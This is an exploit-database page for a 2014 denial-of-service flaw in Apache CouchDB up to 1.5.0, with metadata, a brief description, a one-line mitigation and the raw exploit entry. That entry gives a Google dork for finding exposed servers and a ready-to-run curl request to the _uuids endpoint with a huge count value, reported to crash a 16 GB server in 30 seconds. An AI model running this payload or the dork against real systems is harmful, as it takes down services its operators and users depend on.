header-logo
Suggest Exploit
vendor:
Couchdb
by:
KrustyHack
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Couchdb
Affected Version From: up to 1.5.0
Affected Version To: up to 1.5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:apache:couchdb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2014

Couchdb uuids DOS exploit

This exploit allows an attacker to cause a denial of service (DoS) on a Couchdb server by sending a GET request to the _uuids endpoint with a large count parameter. This causes the server to allocate a large amount of memory, eventually leading to a crash.

Mitigation:

Limit the number of UUIDs that can be requested from the _uuids endpoint.
Source

Exploit-DB raw data:

# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0

HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999

TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.

Navigation

Suggest Exploit

Services By CQR